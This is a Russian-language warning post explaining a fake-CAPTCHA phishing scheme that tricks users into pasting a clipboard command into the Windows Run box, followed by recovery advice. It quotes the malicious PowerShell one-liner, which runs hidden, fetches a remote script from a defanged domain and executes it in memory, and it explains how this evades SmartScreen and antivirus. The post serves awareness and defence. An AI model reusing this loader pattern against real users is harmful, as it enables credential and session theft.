Новый хитрый фишинг: схема заражения через поддельную капчу
Столкнулся с новым видом фишинга и чуть не попался 😁 Страница имитирует проверку Cloudflare: оформление один в один с оригиналом, но вместо чекбокса показывает инструкцию из трёх шагов: Win + R, Ctrl + V, Enter.
Пока висит «проверка», страница без вашего участия записывает в буфер обмена команду:
powershell -wi mi -nop -Command "$a=irm 'spoutpoploaderfast[.]monster/...';$ExecutionContext.InvokeCommand.InvokeScript($a)"
Как это работает: -wi mi сворачивает окно PowerShell при запуске. -nop пропускает загрузку профиля. irm (Invoke-RestMethod) скачивает текст скрипта с внешнего домена. InvokeScript выполняет его прямо в памяти (In-Memory Execution).
На диск ничего не записывается, загрузки файла нет, а значит, нет предупреждений браузера и SmartScreen. Сигнатурному антивирусу буквально нечего проверять. Команду запускает сам пользователь от своей учётной записи, поэтому с точки зрения системы всё выглядит легитимно.
Последствия Загружается стилер (Lumma, StealC и аналоги). Он собирает пароли из браузеров, данные карт, файлы криптокошельков и сессионные куки. Куки здесь опаснее паролей. Активная сессия даёт доступ к аккаунту без ввода пароля и 2FA, так как двухфакторка уже считаются пройденной.
Признак, по которому схема определяется сразу Настоящая капча не требует действий за пределами окна браузера. Cloudflare Turnstile, reCAPTCHA и hCaptcha никогда не просят открывать «Выполнить», нажимать комбинации клавиш или вставлять текст в консоль.
Если вы это уже выполнили Действуйте быстро, скорость важнее аккуратности: 1. Отключите ПК от сети (кабелем или отключите Wi-Fi). 2. Возьмите другое (чистое) устройство: все дальнейшие шаги делайте только с него. 3. Смените пароли, начиная с основной почты. Почта — это ключ ко всем остальным сервисам. 4. Завершите все активные сессии везде, где возможно (Google, Telegram, банки, биржи). Смена пароля не всегда убивает украденную сессию, а явный отзыв - убивает. 5. Перевыпустите 2FA, старые коды восстановления считайте скомпрометированными. 6. Криптоактивы переведите на новый кошелёк с новой seed-фразой. 7. Систему на ПК лучше переустановить с нуля. Простая чистка антивирусом не даёт 100% гарантии.
P.S. Проверить, что именно запускалось через окно «Выполнить», можно в реестре по адресу:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU